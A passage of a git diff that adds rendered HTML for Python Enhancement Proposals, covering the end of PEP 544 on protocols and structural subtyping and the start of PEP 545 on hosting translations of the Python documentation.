+c = Other()  # Also OK
+
+
+
+
+

Callback protocols

+

Protocols can be used to define flexible callback types that are hard +(or even impossible) to express using the Callable[...] syntax +specified by PEP 484, such as variadic, overloaded, and complex generic +callbacks. They can be defined as protocols with a __call__ member:

+
from typing import Optional, List, Protocol
+
+class Combiner(Protocol):
+    def __call__(self, *vals: bytes,
+                 maxlen: Optional[int] = None) -> List[bytes]: ...
+
+def good_cb(*vals: bytes, maxlen: Optional[int] = None) -> List[bytes]:
+    ...
+def bad_cb(*vals: bytes, maxitems: Optional[int]) -> List[bytes]:
+    ...
+
+comb: Combiner = good_cb  # OK
+comb = bad_cb  # Error! Argument 2 has incompatible type because of
+               # different name and kind in the callback
+
+
+

Callback protocols and Callable[...] types can be used interchangeably.

+
+
+
+

Using Protocols

+
+

Subtyping relationships with other types

+

Protocols cannot be instantiated, so there are no values whose +runtime type is a protocol. For variables and parameters with protocol types, +subtyping relationships are subject to the following rules:

+
    +
  • A protocol is never a subtype of a concrete type.
  • +
  • A concrete type X is a subtype of protocol P +if and only if X implements all protocol members of P with +compatible types. In other words, subtyping with respect to a protocol is +always structural.
  • +
  • A protocol P1 is a subtype of another protocol P2 if P1 defines +all protocol members of P2 with compatible types.
  • +
+

Generic protocol types follow the same rules of variance as non-protocol +types. Protocol types can be used in all contexts where any other types +can be used, such as in Union, ClassVar, type variables bounds, etc. +Generic protocols follow the rules for generic abstract classes, except for +using structural compatibility instead of compatibility defined by +inheritance relationships.

+

Static type checkers will recognize protocol implementations, even if the +corresponding protocols are not imported:

+
# file lib.py
+from typing import Sized
+
+T = TypeVar('T', contravariant=True)
+class ListLike(Sized, Protocol[T]):
+    def append(self, x: T) -> None:
+        pass
+
+def populate(lst: ListLike[int]) -> None:
+    ...
+
+# file main.py
+from lib import populate  # Note that ListLike is NOT imported
+
+class MockStack:
+    def __len__(self) -> int:
+        return 42
+    def append(self, x: int) -> None:
+        print(x)
+
+populate([1, 2, 3])    # Passes type check
+populate(MockStack())  # Also OK
+
+
+
+
+

Unions and intersections of protocols

+

Union of protocol classes behaves the same way as for non-protocol +classes. For example:

+
from typing import Union, Optional, Protocol
+
+class Exitable(Protocol):
+    def exit(self) -> int:
+        ...
+class Quittable(Protocol):
+    def quit(self) -> Optional[int]:
+        ...
+
+def finish(task: Union[Exitable, Quittable]) -> int:
+    ...
+class DefaultJob:
+    ...
+    def quit(self) -> int:
+        return 0
+finish(DefaultJob()) # OK
+
+
+

One can use multiple inheritance to define an intersection of protocols. +Example:

+
from typing import Iterable, Hashable
+
+class HashableFloats(Iterable[float], Hashable, Protocol):
+    pass
+
+def cached_func(args: HashableFloats) -> float:
+    ...
+cached_func((1, 2, 3)) # OK, tuple is both hashable and iterable
+
+
+

If this will prove to be a widely used scenario, then a special +intersection type construct could be added in future as specified by PEP 483, +see rejected ideas for more details.

+
+
+

Type[] and class objects vs protocols

+

Variables and parameters annotated with Type[Proto] accept only concrete +(non-protocol) subtypes of Proto. The main reason for this is to allow +instantiation of parameters with such type. For example:

+
class Proto(Protocol):
+    @abstractmethod
+    def meth(self) -> int:
+        ...
+class Concrete:
+    def meth(self) -> int:
+        return 42
+
+def fun(cls: Type[Proto]) -> int:
+    return cls().meth() # OK
+fun(Proto)              # Error
+fun(Concrete)           # OK
+
+
+

The same rule applies to variables:

+
var: Type[Proto]
+var = Proto    # Error
+var = Concrete # OK
+var().meth()   # OK
+
+
+

Assigning an ABC or a protocol class to a variable is allowed if it is +not explicitly typed, and such assignment creates a type alias. +For normal (non-abstract) classes, the behavior of Type[] is +not changed.

+

A class object is considered an implementation of a protocol if accessing +all members on it results in types compatible with the protocol members. +For example:

+
from typing import Any, Protocol
+
+class ProtoA(Protocol):
+    def meth(self, x: int) -> int: ...
+class ProtoB(Protocol):
+    def meth(self, obj: Any, x: int) -> int: ...
+
+class C:
+    def meth(self, x: int) -> int: ...
+
+a: ProtoA = C  # Type check error, signatures don't match!
+b: ProtoB = C  # OK
+
+
+
+
+

NewType() and type aliases

+

Protocols are essentially anonymous. To emphasize this point, static type +checkers might refuse protocol classes inside NewType() to avoid an +illusion that a distinct type is provided:

+
from typing import NewType, Protocol, Iterator
+
+class Id(Protocol):
+    code: int
+    secrets: Iterator[bytes]
+
+UserId = NewType('UserId', Id)  # Error, can't provide distinct type
+
+
+

In contrast, type aliases are fully supported, including generic type +aliases:

+
from typing import TypeVar, Reversible, Iterable, Sized
+
+T = TypeVar('T')
+class SizedIterable(Iterable[T], Sized, Protocol):
+    pass
+CompatReversible = Union[Reversible[T], SizedIterable[T]]
+
+
+
+
+

Modules as implementations of protocols

+

A module object is accepted where a protocol is expected if the public +interface of the given module is compatible with the expected protocol. +For example:

+
# file default_config.py
+timeout = 100
+one_flag = True
+other_flag = False
+
+# file main.py
+import default_config
+from typing import Protocol
+
+class Options(Protocol):
+    timeout: int
+    one_flag: bool
+    other_flag: bool
+
+def setup(options: Options) -> None:
+    ...
+
+setup(default_config)  # OK
+
+
+

To determine compatibility of module level functions, the self argument +of the corresponding protocol methods is dropped. For example:

+
# callbacks.py
+def on_error(x: int) -> None:
+    ...
+def on_success() -> None:
+    ...
+
+# main.py
+import callbacks
+from typing import Protocol
+
+class Reporter(Protocol):
+    def on_error(self, x: int) -> None:
+        ...
+    def on_success(self) -> None:
+        ...
+
+rp: Reporter = callbacks  # Passes type check
+
+
+
+
+

@runtime_checkable decorator and narrowing types by isinstance()

+

The default semantics is that isinstance() and issubclass() fail +for protocol types. This is in the spirit of duck typing – protocols +basically would be used to model duck typing statically, not explicitly +at runtime.

+

However, it should be possible for protocol types to implement custom +instance and class checks when this makes sense, similar to how Iterable +and other ABCs in collections.abc and typing already do it, +but this is limited to non-generic and unsubscripted generic protocols +(Iterable is statically equivalent to Iterable[Any]). +The typing module will define a special @runtime_checkable class decorator +that provides the same semantics for class and instance checks as for +collections.abc classes, essentially making them “runtime protocols”:

+
from typing import runtime_checkable, Protocol
+
+@runtime_checkable
+class SupportsClose(Protocol):
+    def close(self):
+        ...
+
+assert isinstance(open('some/file'), SupportsClose)
+
+
+

Note that instance checks are not 100% reliable statically, this is why +this behavior is opt-in, see section on rejected +ideas for examples. +The most type checkers can do is to treat isinstance(obj, Iterator) +roughly as a simpler way to write +hasattr(x, '__iter__') and hasattr(x, '__next__'). To minimize +the risks for this feature, the following rules are applied.

+

Definitions:

+
    +
  • Data, and non-data protocols: A protocol is called non-data protocol +if it only contains methods as members (for example Sized, +Iterator, etc). A protocol that contains at least one non-method member +(like x: int) is called a data protocol.
  • +
  • Unsafe overlap: A type X is called unsafely overlapping with +a protocol P, if X is not a subtype of P, but it is a subtype +of the type erased version of P where all members have type Any. +In addition, if at least one element of a union unsafely overlaps with +a protocol P, then the whole union is unsafely overlapping with P.
  • +
+

Specification:

+
    +
  • A protocol can be used as a second argument in isinstance() and +issubclass() only if it is explicitly opt-in by @runtime_checkable +decorator. This requirement exists because protocol checks are not type safe +in case of dynamically set attributes, and because type checkers can only prove +that an isinstance() check is safe only for a given class, not for all its +subclasses.
  • +
  • isinstance() can be used with both data and non-data protocols, while +issubclass() can be used only with non-data protocols. This restriction +exists because some data attributes can be set on an instance in constructor +and this information is not always available on the class object.
  • +
  • Type checkers should reject an isinstance() or issubclass() call, if +there is an unsafe overlap between the type of the first argument and +the protocol.
  • +
  • Type checkers should be able to select a correct element from a union after +a safe isinstance() or issubclass() call. For narrowing from non-union +types, type checkers can use their best judgement (this is intentionally +unspecified, since a precise specification would require intersection types).
  • +
+
+
+
+

Using Protocols in Python 2.7 - 3.5

+

Variable annotation syntax was added in Python 3.6, so that the syntax +for defining protocol variables proposed in specification section can’t +be used if support for earlier versions is needed. To define these +in a manner compatible with older versions of Python one can use properties. +Properties can be settable and/or abstract if needed:

+
class Foo(Protocol):
+    @property
+    def c(self) -> int:
+        return 42         # Default value can be provided for property...
+
+    @abstractproperty
+    def d(self) -> int:   # ... or it can be abstract
+        return 0
+
+
+

Also function type comments can be used as per PEP 484 (for example +to provide compatibility with Python 2). The typing module changes +proposed in this PEP will also be backported to earlier versions via the +backport currently available on PyPI.

+
+
+

Runtime Implementation of Protocol Classes

+
+

Implementation details

+

The runtime implementation could be done in pure Python without any +effects on the core interpreter and standard library except in the +typing module, and a minor update to collections.abc:

+
    +
  • Define class typing.Protocol similar to typing.Generic.
  • +
  • Implement functionality to detect whether a class is +a protocol or not. Add a class attribute _is_protocol = True +if that is the case. Verify that a protocol class only has protocol +base classes in the MRO (except for object).
  • +
  • Implement @runtime_checkable that allows __subclasshook__() +performing structural instance and subclass checks as in collections.abc +classes.
  • +
  • All structural subtyping checks will be performed by static type checkers, +such as mypy [mypy]. No additional support for protocol validation will +be provided at runtime.
  • +
+
+
+

Changes in the typing module

+

The following classes in typing module will be protocols:

+
    +
  • Callable
  • +
  • Awaitable
  • +
  • Iterable, Iterator
  • +
  • AsyncIterable, AsyncIterator
  • +
  • Hashable
  • +
  • Sized
  • +
  • Container
  • +
  • Collection
  • +
  • Reversible
  • +
  • ContextManager, AsyncContextManager
  • +
  • SupportsAbs (and other Supports* classes)
  • +
+

Most of these classes are small and conceptually simple. It is easy to see +what are the methods these protocols implement, and immediately recognize +the corresponding runtime protocol counterpart. +Practically, few changes will be needed in typing since some of these +classes already behave the necessary way at runtime. Most of these will need +to be updated only in the corresponding typeshed stubs [typeshed].

+

All other concrete generic classes such as List, Set, IO, +Deque, etc are sufficiently complex that it makes sense to keep +them non-protocols (i.e. require code to be explicit about them). Also, it is +too easy to leave some methods unimplemented by accident, and explicitly +marking the subclass relationship allows type checkers to pinpoint the missing +implementations.

+
+
+

Introspection

+

The existing class introspection machinery (dir, __annotations__ etc) +can be used with protocols. In addition, all introspection tools implemented +in the typing module will support protocols. Since all attributes need +to be defined in the class body based on this proposal, protocol classes will +have even better perspective for introspection than regular classes where +attributes can be defined implicitly – protocol attributes can’t be +initialized in ways that are not visible to introspection +(using setattr(), assignment via self, etc.). Still, some things like +types of attributes will not be visible at runtime in Python 3.5 and earlier, +but this looks like a reasonable limitation.

+

There will be only limited support of isinstance() and issubclass() +as discussed above (these will always fail with TypeError for +subscripted generic protocols, since a reliable answer could not be given +at runtime in this case). But together with other introspection tools this +give a reasonable perspective for runtime type checking tools.

+
+
+
+

Rejected/Postponed Ideas

+

The ideas in this section were previously discussed in [several] +[discussions] [elsewhere].

+
+

Make every class a protocol by default

+

Some languages such as Go make structural subtyping the only or the primary +form of subtyping. We could achieve a similar result by making all classes +protocols by default (or even always). However we believe that it is better +to require classes to be explicitly marked as protocols, for the following +reasons:

+
    +
  • Protocols don’t have some properties of regular classes. In particular, +isinstance(), as defined for normal classes, is based on the nominal +hierarchy. In order to make everything a protocol by default, and have +isinstance() work would require changing its semantics, +which won’t happen.
  • +
  • Protocol classes should generally not have many method implementations, +as they describe an interface, not an implementation. +Most classes have many method implementations, making them bad protocol +classes.
  • +
  • Experience suggests that many classes are not practical as protocols anyway, +mainly because their interfaces are too large, complex or +implementation-oriented (for example, they may include de facto +private attributes and methods without a __ prefix).
  • +
  • Most actually useful protocols in existing Python code seem to be implicit. +The ABCs in typing and collections.abc are rather an exception, but +even they are recent additions to Python and most programmers +do not use them yet.
  • +
  • Many built-in functions only accept concrete instances of int +(and subclass instances), and similarly for other built-in classes. Making +int a structural type wouldn’t be safe without major changes to the +Python runtime, which won’t happen.
  • +
+
+
+

Protocols subclassing normal classes

+

The main rationale to prohibit this is to preserve transitivity of subtyping, +consider this example:

+
from typing import Protocol
+
+class Base:
+    attr: str
+
+class Proto(Base, Protocol):
+    def meth(self) -> int:
+        ...
+
+class C:
+    attr: str
+    def meth(self) -> int:
+        return 0
+
+
+

Now, C is a subtype of Proto, and Proto is a subtype of Base. +But C cannot be a subtype of Base (since the latter is not +a protocol). This situation would be really weird. In addition, there is +an ambiguity about whether attributes of Base should become protocol +members of Proto.

+
+
+

Support optional protocol members

+

We can come up with examples where it would be handy to be able to say +that a method or data attribute does not need to be present in a class +implementing a protocol, but if it is present, it must conform to a specific +signature or type. One could use a hasattr() check to determine whether +they can use the attribute on a particular instance.

+

Languages such as TypeScript have similar features and +apparently they are pretty commonly used. The current realistic potential +use cases for protocols in Python don’t require these. In the interest +of simplicity, we propose to not support optional methods or attributes. +We can always revisit this later if there is an actual need.

+
+
+

Allow only protocol methods and force use of getters and setters

+

One could argue that protocols typically only define methods, but not +variables. However, using getters and setters in cases where only a +simple variable is needed would be quite unpythonic. Moreover, the widespread +use of properties (that often act as type validators) in large code bases +is partially due to previous absence of static type checkers for Python, +the problem that PEP 484 and this PEP are aiming to solve. For example:

+
# without static types
+
+class MyClass:
+    @property
+    def my_attr(self):
+        return self._my_attr
+    @my_attr.setter
+    def my_attr(self, value):
+        if not isinstance(value, int):
+            raise ValidationError("An integer expected for my_attr")
+        self._my_attr = value
+
+# with static types
+
+class MyClass:
+    my_attr: int
+
+
+
+
+

Support non-protocol members

+

There was an idea to make some methods “non-protocol” (i.e. not necessary +to implement, and inherited in explicit subclassing), but it was rejected, +since this complicates things. For example, consider this situation:

+
class Proto(Protocol):
+    @abstractmethod
+    def first(self) -> int:
+        raise NotImplementedError
+    def second(self) -> int:
+        return self.first() + 1
+
+def fun(arg: Proto) -> None:
+    arg.second()
+
+
+

The question is should this be an error? We think most people would expect +this to be valid. Therefore, to be on the safe side, we need to require both +methods to be implemented in implicit subclasses. In addition, if one looks +at definitions in collections.abc, there are very few methods that could +be considered “non-protocol”. Therefore, it was decided to not introduce +“non-protocol” methods.

+

There is only one downside to this: it will require some boilerplate for +implicit subtypes of “large” protocols. But, this doesn’t apply to “built-in” +protocols that are all “small” (i.e. have only few abstract methods). +Also, such style is discouraged for user-defined protocols. It is recommended +to create compact protocols and combine them.

+
+
+

Make protocols interoperable with other approaches

+

The protocols as described here are basically a minimal extension to +the existing concept of ABCs. We argue that this is the way they should +be understood, instead of as something that replaces Zope interfaces, +for example. Attempting such interoperabilities will significantly +complicate both the concept and the implementation.

+

On the other hand, Zope interfaces are conceptually a superset of protocols +defined here, but using an incompatible syntax to define them, +because before PEP 526 there was no straightforward way to annotate attributes. +In the 3.6+ world, zope.interface might potentially adopt the Protocol +syntax. In this case, type checkers could be taught to recognize interfaces +as protocols and make simple structural checks with respect to them.

+
+
+

Use assignments to check explicitly that a class implements a protocol

+

In the Go language the explicit checks for implementation are performed +via dummy assignments [golang]. Such a way is also possible with the +current proposal. Example:

+
class A:
+    def __len__(self) -> float:
+        return ...
+
+_: Sized = A()  # Error: A.__len__ doesn't conform to 'Sized'
+                # (Incompatible return type 'float')
+
+
+

This approach moves the check away from +the class definition and it almost requires a comment as otherwise +the code probably would not make any sense to an average reader +– it looks like dead code. Besides, in the simplest form it requires one +to construct an instance of A, which could be problematic if this requires +accessing or allocating some resources such as files or sockets. +We could work around the latter by using a cast, for example, but then +the code would be ugly. Therefore, we discourage the use of this pattern.

+
+
+

Support isinstance() checks by default

+

The problem with this is instance checks could be unreliable, except for +situations where there is a common signature convention such as Iterable. +For example:

+
class P(Protocol):
+    def common_method_name(self, x: int) -> int: ...
+
+class X:
+    <a bunch of methods>
+    def common_method_name(self) -> None: ... # Note different signature
+
+def do_stuff(o: Union[P, X]) -> int:
+    if isinstance(o, P):
+        return o.common_method_name(1)  # Results in TypeError not caught
+                                        # statically if o is an X instance.
+
+
+

Another potentially problematic case is assignment of attributes +after instantiation:

+
class P(Protocol):
+    x: int
+
+class C:
+    def initialize(self) -> None:
+        self.x = 0
+
+c = C()
+isinstance(c, P)  # False
+c.initialize()
+isinstance(c, P)  # True
+
+def f(x: Union[P, int]) -> None:
+    if isinstance(x, P):
+        # Static type of x is P here.
+        ...
+    else:
+        # Static type of x is int, but can be other type at runtime...
+        print(x + 1)
+
+f(C())  # ...causing a TypeError.
+
+
+

We argue that requiring an explicit class decorator would be better, since +one can then attach warnings about problems like this in the documentation. +The user would be able to evaluate whether the benefits outweigh +the potential for confusion for each protocol and explicitly opt in – but +the default behavior would be safer. Finally, it will be easy to make this +behavior default if necessary, while it might be problematic to make it opt-in +after being default.

+
+
+

Provide a special intersection type construct

+

There was an idea to allow Proto = All[Proto1, Proto2, ...] as a shorthand +for:

+
class Proto(Proto1, Proto2, ..., Protocol):
+    pass
+
+
+

However, it is not yet clear how popular/useful it will be and implementing +this in type checkers for non-protocol classes could be difficult. Finally, it +will be very easy to add this later if needed.

+
+
+

Prohibit explicit subclassing of protocols by non-protocols

+

This was rejected for the following reasons:

+
    +
  • Backward compatibility: People are already using ABCs, including generic +ABCs from typing module. If we prohibit explicit subclassing of these +ABCs, then quite a lot of code will break.
  • +
  • Convenience: There are existing protocol-like ABCs (that may be turned +into protocols) that have many useful “mix-in” (non-abstract) methods. +For example, in the case of Sequence one only needs to implement +__getitem__ and __len__ in an explicit subclass, and one gets +__iter__, __contains__, __reversed__, index, and count +for free.
  • +
  • Explicit subclassing makes it explicit that a class implements a particular +protocol, making subtyping relationships easier to see.
  • +
  • Type checkers can warn about missing protocol members or members with +incompatible types more easily, without having to use hacks like dummy +assignments discussed above in this section.
  • +
  • Explicit subclassing makes it possible to force a class to be considered +a subtype of a protocol (by using # type: ignore together with an +explicit base class) when it is not strictly compatible, such as when +it has an unsafe override.
  • +
+
+
+

Covariant subtyping of mutable attributes

+

Rejected because covariant subtyping of mutable attributes is not safe. +Consider this example:

+
class P(Protocol):
+    x: float
+
+def f(arg: P) -> None:
+    arg.x = 0.42
+
+class C:
+    x: int
+
+c = C()
+f(c)  # Would typecheck if covariant subtyping
+      # of mutable attributes were allowed.
+c.x >> 1  # But this fails at runtime
+
+
+

It was initially proposed to allow this for practical reasons, but it was +subsequently rejected, since this may mask some hard to spot bugs.

+
+
+

Overriding inferred variance of protocol classes

+

It was proposed to allow declaring protocols as invariant if they are actually +covariant or contravariant (as it is possible for nominal classes, see PEP 484). +However, it was decided not to do this because of several downsides:

+
    +
  • Declared protocol invariance breaks transitivity of sub-typing. Consider +this situation:
    T = TypeVar('T')
    +
    +class P(Protocol[T]):  # Protocol is declared as invariant.
    +    def meth(self) -> T:
    +        ...
    +class C:
    +    def meth(self) -> float:
    +        ...
    +class D(C):
    +    def meth(self) -> int:
    +        ...
    +
    +
    +

    Now we have that D is a subtype of C, and C is a subtype of +P[float]. But D is not a subtype of P[float] since D +implements P[int], and P is invariant. There is a possibility +to “cure” this by looking for protocol implementations in MROs but this +will be too complex in a general case, and this “cure” requires abandoning +simple idea of purely structural subtyping for protocols.

    +
  • +
  • Subtyping checks will always require type inference for protocols. In the +above example a user may complain: “Why did you infer P[int] for +my D? It implements P[float]!”. Normally, inference can be overruled +by an explicit annotation, but here this will require explicit subclassing, +defeating the purpose of using protocols.
  • +
  • Allowing overriding variance will make impossible more detailed error +messages in type checkers citing particular conflicts in member +type signatures.
  • +
  • Finally, explicit is better than implicit in this case. Requiring user to +declare correct variance will simplify understanding the code and will avoid +unexpected errors at the point of use.
  • +
+
+
+

Support adapters and adaptation

+

Adaptation was proposed by PEP 246 (rejected) and is supported by +zope.interface, see the Zope documentation on adapter registries. +Adapters is quite an advanced concept, and PEP 484 supports unions and +generic aliases that can be used instead of adapters. This can be illustrated +with an example of Iterable protocol, there is another way of supporting +iteration by providing __getitem__ and __len__. If a function +supports both this way and the now standard __iter__ method, then it could +be annotated by a union type:

+
class OldIterable(Sized, Protocol[T]):
+    def __getitem__(self, item: int) -> T: ...
+
+CompatIterable = Union[Iterable[T], OldIterable[T]]
+
+class A:
+    def __iter__(self) -> Iterator[str]: ...
+class B:
+    def __len__(self) -> int: ...
+    def __getitem__(self, item: int) -> str: ...
+
+def iterate(it: CompatIterable[str]) -> None:
+    ...
+
+iterate(A())  # OK
+iterate(B())  # OK
+
+
+

Since there is a reasonable alternative for such cases with existing tooling, +it is therefore proposed not to include adaptation in this PEP.

+
+
+

Call structural base types “interfaces”

+

“Protocol” is a term already widely used in Python to describe duck typing +contracts such as the iterator protocol (providing __iter__ +and __next__), and the descriptor protocol (providing __get__, +__set__, and __delete__). In addition to this and other reasons given +in specification, protocols are different from Java interfaces in several +aspects: protocols don’t require explicit declaration of implementation +(they are mainly oriented on duck-typing), protocols can have +default implementations of members and store state.

+
+
+

Make protocols special objects at runtime rather than normal ABCs

+

Making protocols non-ABCs will make the backwards compatibility problematic +if possible at all. For example, collections.abc.Iterable is already +an ABC, and lots of existing code use patterns like +isinstance(obj, collections.abc.Iterable) and similar checks with other +ABCs (also in a structural manner, i.e., via __subclasshook__). +Disabling this behavior will cause breakages. If we keep this behavior +for ABCs in collections.abc but will not provide a similar runtime +behavior for protocols in typing, then a smooth transition to protocols +will be not possible. In addition, having two parallel hierarchies may cause +confusions.

+
+
+
+

Backwards Compatibility

+

This PEP is fully backwards compatible.

+
+
+

Implementation

+

The mypy type checker fully supports protocols (modulo a few +known bugs). This includes treating all the builtin protocols, such as +Iterable structurally. The runtime implementation of protocols is +available in typing_extensions module on PyPI.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0544.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0545/index.html b/pep-0545/index.html new file mode 100644 index 00000000000..149869704ea --- /dev/null +++ b/pep-0545/index.html @@ -0,0 +1,778 @@ + + + + + + + + PEP 545 – Python Documentation Translations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 545 – Python Documentation Translations

+
+
Author:
+
Julien Palard <julien at palard.fr>, +Inada Naoki <songofacandy at gmail.com>, +Victor Stinner <vstinner at python.org>
+
Status:
+
Active
+
Type:
+
Process
+
Topic:
+
Governance
+
Created:
+
04-Mar-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

The intent of this PEP is to make existing translations of the Python +Documentation more accessible and discoverable. By doing so, we hope +to attract and motivate new translators and new translations.

+

Translated documentation will be hosted on python.org. Examples of +two active translation teams:

+ +

http://docs.python.org/en/ will redirect to http://docs.python.org/.

+

Sources of translated documentation will be hosted in the Python +organization on GitHub: https://github.com/python/. Contributors will +have to accept a Documentation Contribution Agreement.

+
+
+

Motivation

+

On the French #python-fr IRC channel on freenode, it’s not rare to +meet people who don’t speak English and so are unable to read the +Python official documentation. Python wants to be widely available +to all users in any language: this is also why Python 3 supports +any non-ASCII identifiers: +PEP 3131

+

There are at least 4 groups of people who are translating the Python +documentation to their native language (French [16] [17] [18], +Japanese [19] [20], Spanish [21], Hungarian [26] [27]) even +though their translations are not visible on d.p.o. Other, less +visible and less organized groups, are also translating the +documentation, we’ve heard of Russian [25], Chinese and +Korean. Others we haven’t found yet might also exist. This PEP +defines rules describing how to move translations on docs.python.org +so they can easily be found by developers, newcomers and potential +translators.

+

The Japanese team has (as of March 2017) translated ~80% of the +documentation, the French team ~20%. French translation went from 6% +to 23% in 2016 [13] with 7 contributors [14], proving a translation +team can be faster than the rate the documentation mutates.

+

Quoting Xiang Zhang about Chinese translations:

+
+
I have seen several groups trying to translate part of our official +doc. But their efforts are disperse and quickly become lost because +they are not organized to work towards a single common result and +their results are hold anywhere on the Web and hard to find. An +official one could help ease the pain.
+
+
+

Rationale

+
+

Translation

+
+

Issue tracker

+

Considering that issues opened about translations may be written in +the translation language, which can be considered noise but at least +is inconsistent, issues should be placed outside bugs.python.org (b.p.o).

+

As all translation must have their own GitHub project (see Repository +for Po Files), they must use the associated GitHub issue tracker.

+

Considering the noise induced by translation issues redacted in any +languages which may beyond every warnings land in b.p.o, triage will +have to be done. Considering that translations already exist and are +not actually a source of noise in b.p.o, an unmanageable amount of +work is not to be expected. Considering that Xiang Zhang and Victor +Stinner are already triaging, and Julien Palard is willing to help on +this task, noise on b.p.o is not to be expected.

+

Also, language team coordinators (see Language Team) should help +with triaging b.p.o by properly indicating, in the language of the +issue author if required, the right issue tracker.

+
+
+

Branches

+

Translation teams should focus on last stable versions, and use tools +(scripts, translation memory, …) to automatically translate what is +done in one branch to other branches.

+
+

Note

+

Translation memories are a kind of database of previously translated +paragraphs, even removed ones. See also Sphinx Internationalization.

+
+

The three currently stable branches that will be translated are [12]: +2.7, 3.5, and 3.6. The scripts to build the documentation of older +branches needs to be modified to support translation [12], whereas +these branches now only accept security-only fixes.

+

The development branch (main) should have a lower translation priority +than stable branches. But docsbuild-scripts should build it anyway so +it is possible for a team to work on it to be ready for the next +release.

+
+
+
+

Hosting

+
+

Domain Name, Content negotiation and URL

+

Different translations can be identified by changing one of the +following: Country Code Top Level Domain (CCTLD), +path segment, subdomain or content negotiation.

+

Buying a CCTLD for each translations is expensive, time-consuming, and +sometimes almost impossible when already registered, this solution +should be avoided.

+

Using subdomains like “es.docs.python.org” or “docs.es.python.org” is +possible but confusing (“is it es.docs.python.org or +docs.es.python.org?”). Hyphens in subdomains like +pt-br.doc.python.org is uncommon and SEOMoz [23] correlated the +presence of hyphens as a negative factor. Usage of underscores in +subdomain is prohibited by the RFC 1123, section 2.1. Finally, +using subdomains means creating TLS certificates for each +language. This not only requires more maintenance but will also cause +issues in language switcher if, as for version switcher, we want a +preflight to check if the translation exists in the given version: +preflight will probably be blocked by same-origin-policy. Wildcard +TLS certificates are very expensive.

+

Using content negotiation (HTTP headers Accept-Language in the +request and Vary: Accept-Language) leads to a bad user experience +where they can’t easily change the language. According to Mozilla: +“This header is a hint to be used when the server has no way of +determining the language via another way, like a specific URL, that is +controlled by an explicit user decision.” [24]. As we want to be +able to easily change the language, we should not use the content +negotiation as a main language determination, so we need something +else.

+

Last solution is to use the URL path, which looks readable, allows +for an easy switch from a language to another, and nicely accepts +hyphens. Typically something like: “docs.python.org/de/” or, by +using a hyphen: “docs.python.org/pt-BR/”.

+

As for the version, sphinx-doc does not support compiling for multiple +languages, so we’ll have full builds rooted under a path, exactly like +we’re already doing with versions.

+

So we can have “docs.python.org/de/3.6/” or +“docs.python.org/3.6/de/”. A question that arises is: +“Does the language contain multiple versions or does the version contain +multiple languages?”. As versions exist in any case and translations +for a given version may or may not exist, we may prefer +“docs.python.org/3.6/de/”, but doing so scatters languages everywhere. +Having “/de/3.6/” is clearer, meaning: “everything under /de/ is written +in German”. Having the version at the end is also a habit taken by +readers of the documentation: they like to easily change the version +by changing the end of the path.

+

So we should use the following pattern: +“docs.python.org/LANGUAGE_TAG/VERSION/”.

+

The current documentation is not moved to “/en/”, instead +“docs.python.org/en/” will redirect to “docs.python.org”.

+
+
+

Language Tag

+

A common notation for language tags is the IETF Language Tag +[4] based on ISO 639, although gettext uses ISO 639 tags with +underscores (ex: pt_BR) instead of dashes to join tags [5] +(ex: pt-BR). Examples of IETF Language Tags: fr (French), +ja (Japanese), pt-BR (Orthographic formulation of 1943 - +Official in Brazil).

+

It is more common to see dashes instead of underscores in URLs [6], +so we should use IETF language tags, even if sphinx uses gettext +internally: URLs are not meant to leak the underlying implementation.

+

It’s uncommon to see capitalized letters in URLs, and docs.python.org +doesn’t use any, so it may hurt readability by attracting the eye on it, +like in: “https://docs.python.org/pt-BR/3.6/library/stdtypes.html”. +RFC 5646#section-2.1.1 +(Tags for Identifying Languages (IETF)) section-2.1 +states that tags are not case sensitive. As the RFC allows lower case, +and it enhances readability, we should use lowercased tags like +pt-br.

+

We may drop the region subtag when it does not add distinguishing +information, for example: “de-DE” or “fr-FR”. (Although it might +make sense, respectively meaning “German as spoken in Germany” +and “French as spoken in France”). But when the region subtag +actually adds information, for example “pt-BR” or “Portuguese as +spoken in Brazil”, it should be kept.

+

So we should use IETF language tags, lowercased, like /fr/, +/pt-br/, /de/ and so on.

+
+
+

Fetching And Building Translations

+

Currently docsbuild-scripts are building the documentation [8]. +These scripts should be modified to fetch and build translations.

+

Building new translations is like building new versions so, while we’re +adding complexity it is not that much.

+

Two steps should be configurable distinctively: Building a new language, +and adding it to the language switcher. This allows a transition step +between “we accepted the language” and “it is translated enough to be +made public”. During this step, translators can review their +modifications on d.p.o without having to build the documentation +locally.

+

From the translation repositories, only the .po files should be +opened by the docsbuild-script to keep the attack surface and probable +bug sources at a minimum. This means no translation can patch sphinx +to advertise their translation tool. (This specific feature should be +handled by sphinx anyway [9]).

+
+
+
+

Community

+
+

Mailing List

+

The doc-sig mailing list will be used to discuss cross-language +changes on translated documentation.

+

There is also the i18n-sig list but it’s more oriented towards i18n APIs +[1] than translating the Python documentation.

+
+
+

Chat

+

Due to the Python community being highly active on IRC, we should +create a new IRC channel on freenode, typically #python-doc for +consistency with the mailing list name.

+

Each language coordinator can organize their own team, even by choosing +another chat system if the local usage asks for it. As local teams +will write in their native languages, we don’t want each team in a +single channel. It’s also natural for the local teams to reuse +their local channels like “#python-fr” for French translators.

+
+
+

Repository for PO Files

+

Considering that each translation team may want to use different +translation tools, and that those tools should easily be synchronized +with git, all translations should expose their .po files via a git +repository.

+

Considering that each translation will be exposed via git +repositories, and that Python has migrated to GitHub, translations +will be hosted on GitHub.

+

For consistency and discoverability, all translations should be in the +same GitHub organization and named according to a common pattern.

+

Given that we want translations to be official, and that Python +already has a GitHub organization, translations should be hosted as +projects of the Python GitHub organization.

+

For consistency, translation repositories should be called +python-docs-LANGUAGE_TAG [22], using the language tag used in +paths: without region subtag if redundant, and lowercased.

+

The docsbuild-scripts may enforce this rule by refusing to fetch +outside of the Python organization or a wrongly named repository.

+

The CLA bot may be used on the translation repositories, but with a +limited effect as local coordinators may synchronize themselves with +translations from an external tool, like transifex, and lose track +of who translated what in the process.

+

Versions can be hosted on different repositories, different directories +or different branches. Storing them on different repositories will +probably pollute the Python GitHub organization. As it +is typical and natural to use branches to separate versions, branches +should be used to do so.

+
+
+

Translation tools

+

